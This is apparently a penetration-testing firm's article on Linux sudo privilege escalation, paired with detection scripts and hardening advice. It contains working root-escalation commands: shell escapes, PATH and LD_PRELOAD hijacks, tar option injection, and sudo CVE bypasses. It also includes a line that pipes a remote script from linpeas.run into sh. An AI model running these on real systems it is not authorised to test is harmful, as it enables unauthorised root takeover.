Last updated: April 26, 2026
If you compromise a low-privilege Linux account, the first command you run is sudo -l. The output tells you whether the account can elevate to root through misconfigured sudoers entries, and surprisingly often it can. This article walks through the eight sudo-based privilege escalation paths that account for most of the Linux privilege escalation findings in our pentests.
The mental model
Sudo is a delegation mechanism. /etc/sudoers says “user X can run command Y as user Z.” Misconfiguration happens when:
- The command Y is too powerful (anything that can spawn a shell, write files, or load arbitrary code)
- The path to command Y is exploitable (writable binary, hijackable interpreter)
- The environment Sudo passes through is exploitable (LD_PRELOAD, PYTHONPATH)
- NOPASSWD removes the last check: without it sudo still wants the account's password, which a shell obtained through an exploit, a leaked SSH key or a hijacked session does not give you
Every PrivEsc check below starts with sudo -l. Read its output carefully: the "Matching Defaults entries" block tells you what sudo does to the environment (env_keep, secure_path, env_reset), and the command entries below it are your candidates. Note that sudo -l itself asks for the password unless at least one of the user's entries carries NOPASSWD (the default listpw=any), so a shell without the password may not even get the listing; sudo -n -l fails cleanly instead of hanging on the prompt.
The 8 paths
1. Sudo on a “shell-spawning” binary
Many binaries that look benign can spawn shells. vi, less, more, find, nmap, man, awk, python, perl, ruby, node, tar, zip. If sudo -l shows the user can run any of these as root, you have a path.
# vi
sudo vi
:set shell=/bin/bash
:shell
# Now root: sudo already runs the binary as root, so the spawned shell is root without -p.
# less / more: type ! followed by a command at the prompt
sudo less /etc/passwd
!/bin/bash
# or press v to drop into $EDITOR (usually vi), then :!/bin/bash from there
# find (-quit so only one shell is spawned)
sudo find . -exec /bin/bash \; -quit
# python
sudo python -c 'import pty; pty.spawn("/bin/bash")'
# tar (with checkpoint feature)
sudo tar cf /dev/null /tmp --checkpoint=1 --checkpoint-action=exec=/bin/bash
The catalogue is at GTFOBins. Memorise the top 20.
2. Sudo on a script that calls insecure functions
Custom shell scripts in /usr/local/bin often run with sudo for "convenience." If the script calls binaries by bare name rather than absolute path, or sources or executes files from a directory you can write to, you can hijack it.
#!/bin/bash
# /usr/local/bin/backup
cp /etc/important.conf /backup/
gzip /backup/important.conf
If cp or gzip is called without an absolute path and sudo passes your PATH through to the script, put malicious binaries earlier in PATH. Whether PATH gets through is decided by secure_path, not by env_keep: sudo's default env_reset keeps the caller's PATH, and only a secure_path setting replaces it. With secure_path absent from the Matching Defaults line of sudo -l:
echo '#!/bin/bash
chmod u+s /bin/bash' > /tmp/cp
chmod +x /tmp/cp
export PATH=/tmp:$PATH
sudo /usr/local/bin/backup
# /bin/bash is now SUID root; -p keeps the effective UID
/bin/bash -p
3. PATH preservation in sudoers
The common belief is that sudo resets PATH. It doesn't: env_reset keeps the caller's PATH (along with TERM, HOME, SHELL and a few others). What sanitises PATH is the secure_path option, which is typically set by the distribution's packaged /etc/sudoers (Debian, Ubuntu and the RHEL family all ship one) rather than by sudo's compiled-in defaults. Entries like env_keep+="PATH" are a sign that someone fought the distro default and are worth a look, but the check that matters is whether secure_path= appears in the Matching Defaults line of sudo -l. If it does, the path hijack above is dead (secure_path wins even over env_keep+=PATH, except for members of exempt_group); if it doesn't, any script the user can sudo that calls a command by bare name is hijackable, absolute paths elsewhere in the script notwithstanding.
4. LD_PRELOAD via env_keep
If sudoers preserves LD_PRELOAD (sudo -l shows env_keep+=LD_PRELOAD in the Matching Defaults line), you can inject a shared library that the dynamic loader runs before the actual command's main(). Any command the user is allowed to run will do, since the payload fires at load time:
cat > /tmp/preload.c <<'EOF'
#define _GNU_SOURCE          /* declares setresuid() in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* With -nostartfiles, _init runs when the library is loaded. */
void _init(void) {
    unsetenv("LD_PRELOAD");  /* don't re-inject into the shell we spawn */
    setresuid(0, 0, 0);      /* real, effective and saved UID to root */
    system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so any-allowed-command
Setting the variable on the sudo command line is permitted precisely because it is in env_keep. This is unrelated to sudo's own setuid binary: the loader drops untrusted LD_PRELOAD entries for setuid executables, but the command sudo execs as root is not setuid, so it honours the variable. The same reasoning applies to LD_LIBRARY_PATH, and to PYTHONPATH or PERL5LIB when the sudo'd command is a script.
5. Sudo with wildcard expansion
If sudoers allows a command with a wildcard in its arguments, e.g.:
user ALL=(root) NOPASSWD: /usr/bin/tar -czf /backup/* /var/log
the wildcard is matched by sudo, not expanded by your shell, and sudo matches the whole argument list as a single string, so * also matches spaces and crosses word boundaries (the sudoers manual's security notes warn about exactly this: an entry for /bin/cat /var/log/messages* also permits cat /var/log/messages /etc/shadow). Anything you put between /backup/ and /var/log is accepted, including extra tar options:
sudo /usr/bin/tar -czf /backup/x.tgz --checkpoint=1 --checkpoint-action=exec=/bin/bash /var/log
# tar runs /bin/bash as root at the first checkpoint
The shell-side variant is the one most people know from cron: a root script that runs tar czf /backup/x.tgz * from a directory you can write to. There the shell expands * into filenames, so files named like options are handed to tar as options:
cd /srv/shared          # example path: the directory the script archives, writable by you
echo 'chmod u+s /bin/bash' > pe.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh pe.sh'
# next run: tar interprets the filenames as flags and runs pe.sh as root
6. Sudo on a binary you can write
If sudo -l shows a custom binary path and you can write to that file, or to the directory containing it (a writable directory lets you rename the root-owned original away and drop in your own file), replace the binary.
# Check writability of the file and of its directory
ls -la /usr/local/bin/customtool
ls -ld /usr/local/bin
# If writable: replace
echo '#!/bin/bash
/bin/bash -p' > /usr/local/bin/customtool
chmod +x /usr/local/bin/customtool
sudo /usr/local/bin/customtool
7. The (ALL, !root) bypass (CVE-2019-14287)
If the system runs a sudo version older than 1.8.28 and a sudoers entry lets the user run a command as any user except root:
user ALL=(ALL,!root) /usr/bin/some_command
the exclusion can be bypassed by asking for UID -1 (or its unsigned form, 4294967295):
sudo -u#-1 /usr/bin/some_command
Sudo accepted the value without matching it against the !root exclusion and passed -1 to setresuid(), for which -1 means "leave this ID unchanged". Since sudo itself is already running as root, the command runs as root. Fixed in 1.8.28 (October 2019), but legacy systems linger.
8. CVE-2021-3156 (Baron Samedit)
Heap-based buffer overflow in sudo's command-line argument handling, reachable through sudoedit -s. No sudoers entry is needed: any local user can exploit it for root. Affected versions are 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1; fixed in 1.9.5p2 in January 2021. We still find vulnerable builds on legacy CentOS 7 boxes that were never patched. A long argument after a bare backslash, sudoedit -s '\' $(printf 'A%.0s' {1..1000}), crashes vulnerable versions; the non-destructive check from the Qualys advisory is:
sudoedit -s /
# "sudoedit: /: not a regular file"  -> vulnerable
# "usage: sudoedit ..."              -> patched
The systematic enumeration
From any low-privilege shell:
# What sudo allows (the Matching Defaults block shows env_keep and secure_path too)
sudo -l 2>/dev/null
# Non-interactive variant: fails instead of prompting if a password is needed
sudo -n -l 2>/dev/null
# Sudo version (for known CVEs)
sudo --version | head -1
# Env variables preserved, and whether PATH is actually sanitised
sudo -l 2>/dev/null | grep -iE 'env_keep|secure_path|env_reset'
# SUID binaries (related path)
find / -perm -u=s -type f 2>/dev/null
# Scripts executable by all that may have sudo entries
find /usr/local /opt -type f -executable 2>/dev/null
# Run linpeas for full enumeration
curl -fsSL https://linpeas.run | sh
linpeas is the practitioner's standard. Run it and read the output: findings it rates as likely privilege escalation vectors are colour-highlighted. On a client's host, prefer downloading the script, checking it and running it from disk over piping it straight into sh; the release builds live on GitHub (https://github.com/peass-ng/PEASS-ng/releases).
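The triage of sudo -l output described in paths 1, 3, 4, 5 and 7 can be automated. The following is an added example, not code from the article or from linpeas: it parses a constructed sudo -l listing (a weak one and a tightened one, both made up for this example) and flags the patterns above. The SHELL_SPAWNERS set is an assumed subset of the GTFOBins catalogue; the severity labels are this example's own convention.

```python
import re
from dataclasses import dataclass

# Assumed subset of the binaries GTFOBins lists with a sudo shell escape.
SHELL_SPAWNERS = {
    "vi", "vim", "less", "more", "man", "find", "awk", "gawk", "python",
    "python3", "perl", "ruby", "node", "tar", "zip", "nmap", "env", "bash",
    "sh", "nano", "ed", "gdb", "git", "docker",
}
# Variables that change what a root process loads if sudo passes them on.
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH", "PERL5LIB"}

# "(root) NOPASSWD: SETENV: /usr/bin/tar -czf /backup/* /var/log"
ENTRY_RE = re.compile(r"^\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(\S+)\s*(.*)$")


@dataclass(frozen=True)
class Finding:
    severity: str  # "high" or "medium"
    entry: str     # the sudo -l token or line that triggered it
    reason: str


def _sections(text):
    """Split sudo -l output into Defaults tokens and per-command lines."""
    defaults, commands, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if raw.startswith("Matching Defaults entries"):
            section = "defaults"
        elif raw.startswith("User ") and "may run the following" in raw:
            section = "commands"
        elif line and section == "defaults":
            defaults += [t.strip() for t in line.split(",") if t.strip()]
        elif line and section == "commands":
            commands.append(line)
    return defaults, commands


def triage(sudo_l_output):
    """Return Findings for the sudoers misconfigurations covered above."""
    defaults, commands = _sections(sudo_l_output)
    found = []

    kept = set()
    secure_path = any(t.startswith("secure_path") for t in defaults)
    for tok in defaults:
        if tok.startswith("env_keep") and "=" in tok:
            kept.update(tok.split("=", 1)[1].strip().strip('"').split())
    for var in sorted(kept & DANGEROUS_ENV):
        found.append(Finding("high", f"env_keep+={var}",
                             "passed to the root command: library/module hijack"))
    if not secure_path:
        # env_reset keeps the caller's PATH; only secure_path replaces it.
        found.append(Finding("high", "secure_path unset",
                             "caller's PATH reaches root: bare-name calls in "
                             "sudo'd scripts are hijackable"))

    for line in commands:
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, tags, cmd, args = m.groups()
        sev = "high" if "NOPASSWD:" in tags else "medium"
        if cmd == "ALL":
            found.append(Finding("high", line, "unrestricted command set"))
            continue
        base = cmd.rsplit("/", 1)[-1]
        if base in SHELL_SPAWNERS:
            found.append(Finding(sev, line, f"{base} can spawn a shell (GTFOBins)"))
        if "*" in args:
            found.append(Finding(sev, line, "wildcard in arguments matches across "
                                            "word boundaries: extra options accepted"))
        if "!root" in runas.replace(" ", ""):
            found.append(Finding("medium", line, "(ALL, !root) entry: check sudo "
                                                 "version for CVE-2019-14287"))
        if cmd.startswith(("/usr/local/", "/opt/", "/home/", "/tmp/")):
            found.append(Finding(sev, line, "custom binary/script: check writability "
                                            "and bare-name calls inside it"))
    return found


# Constructed sudo -l output for a weak host (not a real system).
SAMPLE = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD

User alice may run the following commands on web01:
    (ALL : ALL) NOPASSWD: /usr/bin/vi
    (root) /usr/local/bin/backup
    (root) NOPASSWD: /usr/bin/tar -czf /backup/* /var/log
    (ALL, !root) /usr/bin/id
"""

# The same host after tightening: secure_path set, one exact command.
HARDENED = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User alice may run the following commands on web01:
    (root) /usr/bin/systemctl restart nginx.service
"""

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"[{f.severity}] {f.entry}\n    {f.reason}")
```

Feed it the real listing with triage(subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout) and treat every "high" as a path to try; the tightened listing produces no findings at all, which is what a sudoers review should aim for.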
Detection — what defenders should do
- auditd rules on /etc/sudoers and /etc/sudoers.d/ — alert on any modification (a write/attribute watch on both paths; a dropped-in NOPASSWD line under sudoers.d is the usual way an attacker keeps root).
- Process accounting — track every sudo invocation: the user, the target user and the command run. Anomalous patterns (rapid sudo to many different commands, sudo to shell-spawning binaries, sudo from a session with TTY=unknown, which is what a reverse shell without a pty looks like) are tells.
- SUID file integrity monitoring — any new SUID binary should fire an alert; chmod u+s /bin/bash is the most common persistence step after a sudo escape.
- EDR with Linux coverage (CrowdStrike, SentinelOne, Defender for Linux) — these can catch GTFOBins-style escapes behaviourally (a root shell whose parent is less or vi), but check that the policy actually fires on it rather than assuming.
- Sudo logging to a remote SIEM — local logs can be tampered with once the attacker is root.
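The process-accounting bullet above is concrete enough to implement. What follows is an added example, not the article's or any vendor's code: it runs three of the detections over constructed auth.log lines in the format sudo writes to syslog (a denied command, a shell-spawning binary run as root, and a burst of distinct sudo commands from one account). The SHELL_SPAWNERS subset, the 60-second window and the burst threshold of four distinct commands are assumptions to tune for your estate.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Assumed subset of the binaries GTFOBins lists with a sudo shell escape.
SHELL_SPAWNERS = {"vi", "vim", "less", "more", "man", "find", "awk", "python",
                  "python3", "perl", "ruby", "node", "tar", "zip", "env", "bash", "sh"}

# The line sudo writes to syslog; "command not allowed" marks a denied attempt.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sudo:\s+(?P<user>\S+) : "
    r"(?:(?P<denied>command not allowed) ; )?TTY=\S+ ; PWD=\S+ ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)


@dataclass(frozen=True)
class Event:
    ts: datetime
    user: str
    target: str
    cmd: str
    denied: bool


@dataclass(frozen=True)
class Alert:
    user: str
    kind: str    # "denied", "shell-spawner" or "burst"
    detail: str


def parse(line):
    """Return an Event for a sudo command log line, or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; fine for deltas inside one log window
    return Event(datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["user"],
                 m["target"], m["cmd"], m["denied"] is not None)


def detect(lines, window_s=60, burst=4):
    """Flag denied sudo attempts, shell-spawners run as root, and bursts of
    distinct sudo commands by one user (what working through sudo -l looks like)."""
    events = [e for e in map(parse, lines) if e]
    alerts = []
    for e in events:
        binary = (e.cmd.split() or [""])[0].rsplit("/", 1)[-1]
        if e.denied:
            alerts.append(Alert(e.user, "denied", e.cmd))
        elif e.target == "root" and binary in SHELL_SPAWNERS:
            alerts.append(Alert(e.user, "shell-spawner", e.cmd))

    by_user = defaultdict(list)
    for e in events:
        by_user[e.user].append(e)
    for user, evs in by_user.items():
        evs.sort(key=lambda ev: ev.ts)
        start = 0
        for end in range(len(evs)):            # sliding window over time
            while (evs[end].ts - evs[start].ts).total_seconds() > window_s:
                start += 1
            distinct = {ev.cmd.split()[0] for ev in evs[start:end + 1]}
            if len(distinct) >= burst:
                alerts.append(Alert(user, "burst",
                                    f"{len(distinct)} distinct commands in {window_s}s"))
                break
    return alerts


# Constructed auth.log excerpt (not from a real host).
LOG = """\
Jan 14 10:22:01 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx.service
Jan 14 10:22:40 web01 sudo:    bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/vi /etc/hosts
Jan 14 11:03:02 web01 sudo:    www-data : command not allowed ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=/bin/bash
Jan 14 11:03:09 web01 sudo:    www-data : TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=/usr/bin/find / -name shadow
Jan 14 11:03:15 web01 sudo:    www-data : TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=/usr/bin/less /etc/passwd
Jan 14 11:03:21 web01 sudo:    www-data : TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=/usr/bin/tar cf /dev/null /tmp --checkpoint=1 --checkpoint-action=exec=/bin/bash
Jan 14 11:03:40 web01 sudo:    www-data : TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=/usr/bin/python3 -c import pty; pty.spawn("/bin/bash")
Jan 14 11:05:00 web01 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by (uid=1000)
"""

if __name__ == "__main__":
    for a in detect(LOG.splitlines()):
        print(f"{a.kind:14} {a.user:10} {a.detail}")
```

alice's systemctl call produces nothing, bob's vi as root produces one alert, and the www-data sequence (a denied bash, then four GTFOBins binaries inside 40 seconds from a pty-less session) produces a denied alert, four shell-spawner alerts and a burst alert; that sequence is the signature of someone reading sudo -l and working down this article.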
Hardening recommendations
- Audit /etc/sudoers for entries allowing shell-spawning binaries. Replace with tight, command-specific entries.
- Set secure_path and keep security-sensitive variables (PATH, LD_PRELOAD, LD_LIBRARY_PATH, PYTHONPATH, PERL5LIB) out of env_keep; a sudoers line that needs one of them is a sign the delegated command should be rewritten instead.
- Use absolute paths in custom scripts called via sudo.
- Patch sudo regularly — sudo CVEs come up. Keep up.
- Replace sudo with doas on hardened boxes — smaller attack surface, fewer features, fewer bugs.
- Implement just-in-time sudo — temporary, time-bound, audit-logged sudo grants instead of permanent sudoers entries.
How to find your next path
For attackers:
- If sudo -l reveals nothing, check group memberships (id): the disk, sudo, lxd, docker and video groups can each lead to root via different paths.
- Check capabilities (getcap -r / 2>/dev/null): a binary with cap_setuid can call setuid(0) without being SUID, and one with cap_dac_read_search can read any file on the box, /etc/shadow included.
- Cron jobs running as root that touch user-writable paths.
For defenders:
- Run linpeas against your own production hosts. Findings are your hardening backlog.
- Review /etc/sudoers entries quarterly with the principle "if this user account were compromised, what could they do?"
Compliance angle
- RBI Cyber Framework — privileged access management requires audited, minimal sudo grants.
- SEBI CSCRF — Linux server hardening is part of expected baseline.
- ISO 27001:2022 A.5.16, A.8.5 — identity and access management.
- CIS Linux Benchmark — extensive sudoers configuration recommendations.
The takeaway
Sudo misconfiguration is the most reliable Linux PrivEsc path because it is the most overlooked. Sysadmins write sudoers entries for convenience and forget them. Run sudo -l on your own production hosts; the output is the auditor's first question and the attacker's first action. Tightening these entries is some of the highest-leverage Linux hardening work available, and in our experience it closes more real attack paths than the next vulnerability scan.
Get a VAPT scoping call
Senior practitioner-led VAPT — not a checklist run by juniors. CVSS-scored findings, free retest, attestation letter. India's SMBs and SaaS teams.